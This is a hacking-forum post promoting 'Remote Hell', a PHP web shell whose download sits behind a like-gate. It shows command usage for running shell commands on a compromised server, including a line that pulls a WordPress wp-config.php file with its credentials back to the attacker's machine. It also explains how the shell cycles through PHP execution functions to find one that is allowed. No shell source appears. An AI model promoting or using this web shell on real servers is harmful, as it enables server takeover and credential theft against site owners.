• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Remote Hell - Another PHP Shell

Status
Not open for further replies.

itsMe

*KillmeMories*
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Jan 8, 2019
Messages
56,623
Solutions
2
Reputation
32
Reaction score
100,455
Points
2,313
Credits
32,750
‎6 Years of Service‎
 
76%
Remote Hell - Another PHP Shell
To see this hidden content, you must like this content.
With Remote Hell you can execute commands like if they're executing in your system.

You can do things like:

Code:
rh ls -l
and Remote Hell will execute the command and gives you the output on the terminal.

This permits the usage of remote commands and local commands, like this:

Code:
rh cat /var/www/wordpress/wp-config.php > wp-config.php
You are sending the content of the remote file to a local file.

It's really simple. But it's really usefull! ;)

Authentication

Remote Hell authenticates you with a very basic mecanism:

You send the password with each HTTP request, if the password is correct, the commands are executed, if not, nothing happens.

Note: If the connection is plaintext (HTTP and not HTTPS), the password will be sent in cleartext.
Execution Methods

Remote Hell automatically tries various PHP command execution methods, or functions:

    system
    shell_exec
    exec
    passthru
    popen

When it finds an allowed method, uses it.

Configuration

You can adjust some parameters editing the ~/.rhell.cfg file, that it's created the first time that you run Remote Hell.

 
Status
Not open for further replies.
Back
Top